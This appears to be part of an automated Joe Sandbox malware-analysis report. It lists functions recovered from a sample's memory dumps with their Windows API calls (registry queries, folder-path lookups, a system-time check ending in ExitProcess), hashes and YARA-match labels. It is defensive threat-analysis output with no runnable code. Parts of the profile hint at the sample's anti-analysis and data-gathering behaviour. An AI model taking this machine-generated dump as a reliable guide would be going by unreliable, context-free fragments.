                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495E7C
                                                      • Part of subcall function 02495E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02495EAB
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495EDC
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F04
                                                      • Part of subcall function 02495E47: lstrcat.KERNEL32(00000000,00000000), ref: 02495F0F
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$FolderPathlstrcat
                                                    • String ID:
                                                    • API String ID: 2938889746-0
                                                    • Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                    • Instruction ID: c7a5e35b297a51813da91198a9d3515cc1b507d91a0480593228f14b9d7ecc75
                                                    • Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                    • Instruction Fuzzy Hash: C9F140B1E112058FDF24DF29C544A59BBB2BF48318F19C1AED809AB3A1D731E942CF91
                                                    Function 02497A84 Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02497AAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497AE7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02497B44
                                                    • StrCmpCA.SHLWAPI(?,00638D84), ref: 02497DE4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                    • Instruction ID: a57d25ffa1211b3187f0f042874d5fa21727c15e5a5efcb9fe2ffcf325b40de4
                                                    • Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                    • Instruction Fuzzy Hash: 32F14FB1E112058FDF24DF29C544A59BBB2BF48318F19C1AED809AB3A1D731E942CF91
                                                    Function 02497D47 Relevance: 7.9, APIs: 5, Instructions: 363COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638D84), ref: 02497DE4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
                                                    • Instruction ID: 0bcf93ae41012bd60d624bcc8c7070f35b92428d6f426736c53fcb714f7a86c0
                                                    • Opcode Fuzzy Hash: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
                                                    • Instruction Fuzzy Hash: 50E14FB1E112058FDF24DF29C544A59BBB2BF48318F19C1AED809AB3A1D771E942CF91
                                                    Function 02489F37 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 123memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 02489F6F
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02489FA1
                                                    • StrStrA.SHLWAPI(00000000,004351E8), ref: 02489FCA
                                                    • memcmp.MSVCRT(?,0042DC44,00000005), ref: 0248A003
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocLocallstrcpymemcmp
                                                    • String ID:
                                                    • API String ID: 4154055062-3916222277
                                                    • Opcode ID: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
                                                    • Instruction ID: dd4ba6f17ec627ee16343ab4b9bc7b6072dd0d450d1dcb7a911dd24e694b1d79
                                                    • Opcode Fuzzy Hash: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
                                                    • Instruction Fuzzy Hash: 5F41A271A11695ABCB11FF75CC40AAF7BB6AF46308F04446AED15A7352EBB0A901CF90
                                                    Function 024A965F Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CodeInfoPageValidmemset
                                                    • String ID:
                                                    • API String ID: 703783727-0
                                                    • Opcode ID: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
                                                    • Instruction ID: 93a41631035bd71493346f1a2c8f37534416490a291969c7530e4748b17f122e
                                                    • Opcode Fuzzy Hash: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
                                                    • Instruction Fuzzy Hash: 4D312B34A04681CBDB268F35C8A437ABFA09F21314F1849AFD891DF2D2C329C446C761
                                                    Function 00421B00 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                      • Part of subcall function 00421800: lstrlenA.KERNEL32(009254F0,00000000,00000000,?,?,00421B61), ref: 00421840
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                      • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                      • Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                      • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                    • sscanf.NTDLL ref: 00421B7A
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
                                                    • ExitProcess.KERNEL32 ref: 00421BC3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                    • String ID:
                                                    • API String ID: 3040284667-0
                                                    • Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                    • Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
                                                    • Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                    • Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6
                                                    Function 024A1D67 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?), ref: 024A1DB9
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A1A96
                                                      • Part of subcall function 024A1A67: lstrlen.KERNEL32(00638DEC), ref: 024A1AA7
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1ACE
                                                      • Part of subcall function 024A1A67: lstrcat.KERNEL32(00000000,00000000), ref: 024A1AD9
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B08
                                                      • Part of subcall function 024A1A67: lstrlen.KERNEL32(00435564), ref: 024A1B1A
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B3B
                                                      • Part of subcall function 024A1A67: lstrcat.KERNEL32(00000000,00435564), ref: 024A1B47
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B76
                                                    • sscanf.NTDLL ref: 024A1DE1
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 024A1DFD
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 024A1E0D
                                                    • ExitProcess.KERNEL32 ref: 024A1E2A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                    • String ID:
                                                    • API String ID: 3040284667-0
                                                    • Opcode ID: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
                                                    • Instruction ID: 383d642741b2e6cfdb46c79f7a5fddb7a31adb6d60fe8e1287f9a5148525b585
                                                    • Opcode Fuzzy Hash: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
                                                    • Instruction Fuzzy Hash: AB21C3B5518301AF8354DF69D88489FBBFAEED8314F409A1EF599C3220E770D6058FA6
                                                    Function 024A3337 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 024A336D
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A3374
                                                    • RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 024A3393
                                                    • RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 024A33AE
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A33B8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3225020163-0
                                                    • Opcode ID: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
                                                    • Instruction ID: 66c31b76347fc70de6d2788668e1249a069cc518ce626c929c35e6e8f65d5c7d
                                                    • Opcode Fuzzy Hash: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
                                                    • Instruction Fuzzy Hash: C8118272A04204AFD714CF94DC45FABBB7DEB48711F00411AFA05D3280DB7459048BE1
                                                    Function 00406E30 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                    • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapmemcpy$AllocProcess
                                                    • String ID: @
                                                    • API String ID: 1643994569-2766056989
                                                    • Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                    • Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
                                                    • Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                    • Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99
                                                    Function 024A2B17 Relevance: 7.5, APIs: 5, Instructions: 49registrymemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 024A2B2C
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2B33
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024A2AB0), ref: 024A2B52
                                                    • RegQueryValueExA.ADVAPI32(024A2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 024A2B6C
                                                    • RegCloseKey.ADVAPI32(024A2AB0), ref: 024A2B76
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3225020163-0
                                                    • Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                    • Instruction ID: 32ee7846072eb4e34ea51eb31f558cd0723c22b0b4d0c875dbf2f9ab49ea5c44
                                                    • Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                    • Instruction Fuzzy Hash: 45019AB5A01318AFE314CFA09C59FEB7BA9AB48755F200099FE4597241EBB059088BA0
                                                    Function 02481267 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0248127C
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02481283
                                                    • RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024812A0
                                                    • RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024812BA
                                                    • RegCloseKey.ADVAPI32(?), ref: 024812C4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3225020163-0
                                                    • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction ID: 617edd9044109b51eb6319a5b0a67eef13d4788ef98c32aa3a8631cbce0b14a5
                                                    • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction Fuzzy Hash: 29F09075A40308BFD7049BA09C4DFEB7B7DEB04755F100059BE09E2280D7B05A048BE0
                                                    Function 024A9268 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __getptd.LIBCMT ref: 024A9274
                                                      • Part of subcall function 024A8A96: __getptd_noexit.LIBCMT ref: 024A8A99
                                                      • Part of subcall function 024A8A96: __amsg_exit.LIBCMT ref: 024A8AA6
                                                    • __getptd.LIBCMT ref: 024A928B
                                                    • __amsg_exit.LIBCMT ref: 024A9299
                                                    • __lock.LIBCMT ref: 024A92A9
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 024A92BD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                    • Instruction ID: c2492feefe95b285cdfe808a8b4f47dde37e3f4195e3e69772883b5496cc167b
                                                    • Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                    • Instruction Fuzzy Hash: 51F0B4339057109BD730BBBA5C21B4E73A1AF20724F10050FE41A6F6C0DB645A409F59
                                                    Function 00423E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124stringtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
                                                    • lstrcpy.KERNEL32(00000000,0094A758), ref: 00423E6F
                                                    • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$SystemTime
                                                    • String ID: *M@
                                                    • API String ID: 684065273-4186991356
                                                    • Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                    • Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
                                                    • Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                    • Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94
                                                    Function 00417CA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417D14
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84
                                                      • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                      • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                      • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                      • Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_$memcpy
                                                    • String ID: string too long
                                                    • API String ID: 2304785028-2556327735
                                                    • Opcode ID: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                    • Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
                                                    • Opcode Fuzzy Hash: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                    • Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED
                                                    Function 0249F247 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249F27A
                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0249F295
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0249F2F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: ERROR
                                                    • API String ID: 3722407311-2861137601
                                                    • Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                    • Instruction ID: 2ad1568431de74119a56df9bab0ea092f11196ed488d99ffc0d8e38f37009235
                                                    • Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                    • Instruction Fuzzy Hash: FC213E706211D66BCB25FF7ACC44B9E3BE5AF04308F00442AE809DBA01EB75D845CB90
                                                    Function 00408740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00408767
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
